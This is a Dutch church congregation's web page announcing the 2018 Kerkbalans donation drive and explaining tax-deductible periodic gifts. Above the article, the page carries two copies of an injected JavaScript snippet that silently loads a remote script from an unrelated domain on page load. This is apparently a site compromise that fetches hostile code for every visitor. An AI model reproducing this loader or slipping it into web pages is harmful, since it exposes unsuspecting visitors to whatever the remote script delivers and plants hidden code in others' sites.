;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Actie Kerkbalans 2018 van start - PKN Damwâld

Actie Kerkbalans 2018 van start

Gepubliceerd op: maandag 22 januari 2018

De actie Kerkbalans 2018 is inmiddels in volle gang bij onze Hervormde en Gereformeerde Kerk. De landelijke actie loopt van 20 januari t/m 3 februari. Het thema is dit jaar : “Geef voor je Kerk.
De kerk en de diaconie krijgen zoals u weet geen subsidies en zijn dus volledig afhankelijk van de financiële bijdragen van betrokken kerkleden, van mensen zoals u. Is de kerk voor u ook een plek van ontmoeting en inspiratie ? We hopen van harte dat u meedoet aan de actie Kerkbalans. Dankzij uw bijdrage kunnen we onze belangrijke taken blijven vervullen. De antwoordformulieren worden bij u opgehaald. De “lopers” komen voor 3 februari bij u langs.
Wij willen u hierbij ook nog even wijzen op de mogelijkheid om een Periodieke Gift te geven. Uw gift aan de kerk en diaconie is onder bepaalde voorwaarden aftrekbaar van de belasting. Dit geldt voor giften boven de 1% ( minimaal € 60) en tot een maximum van 10% van uw verzamelinkomen. Maar die grenzen gelden niet voor een periodieke gift.
Een periodieke gift is een gift waarbij u voor minimaal vijf jaar een vast bedrag per jaar aan de kerk (of diaconie) schenkt. U hoeft hiervoor niet meer naar een notaris. U kunt een periodieke gift nu zelf vastleggen in een overeenkomst die u sluit met uw kerk. Ook onze gemeenten bieden u deze mogelijkheid. Periodieke giften zijn volledig aftrekbaar van de belasting, zonder drempel of maximum. Kiest u ervoor dit belastingvoordeel ten goede te laten komen aan de gemeente, dan kunt u uw bijdrage aan de gemeente verhogen zonder dat het u per saldo meer kost.
N.B geeft u ook nog aan andere goede doelen, dan geldt voor het totaal van die bedragen nog wel een drempel van 1%, tenzij u ook met al die doelen een overeenkomst Periodieke Gift aangaat.

De colleges van kerkrentmeesters van de Hervormde gemeente en de Gereformeerde kerk en het college van de Diaconie van de Gereformeerde Kerk.